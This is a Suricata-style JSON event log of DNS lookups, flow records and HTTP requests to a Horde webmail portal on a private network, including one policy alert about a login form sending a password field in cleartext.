{"timestamp":"2020-02-29T00:19:46.460465+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48104,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:19:46.684313+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48171,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.801513+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48172,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:46.811702+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421}} 
{"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} 
{"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:19:46.942085+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39714,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:47.000564+0000","flow_id":345417056692646,"event_type":"flow","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:46.043430+0000","end":"2020-02-29T00:14:46.152344+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.198540+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39715,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.847877+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310}} 
{"timestamp":"2020-02-29T00:19:47.864664+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":49065,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.868234+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:19:47.870387+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} 
{"timestamp":"2020-02-29T00:19:47.871903+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.873169+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:19:47.875349+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} 
{"timestamp":"2020-02-29T00:19:47.875779+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.901833+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:19:47.901898+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} 
{"timestamp":"2020-02-29T00:19:47.903351+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.904158+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:19:47.904960+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} 
{"timestamp":"2020-02-29T00:19:47.905891+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.906159+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:19:47.907508+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.907715+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:19:47.907813+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:19:47.910822+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:19:47.911656+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.914177+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.914713+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:19:47.914589+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.921254+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:19:47.923471+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.935410+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:19:47.936027+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.936336+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:19:47.936171+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.936959+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:19:47.937801+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:19:47.937896+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} 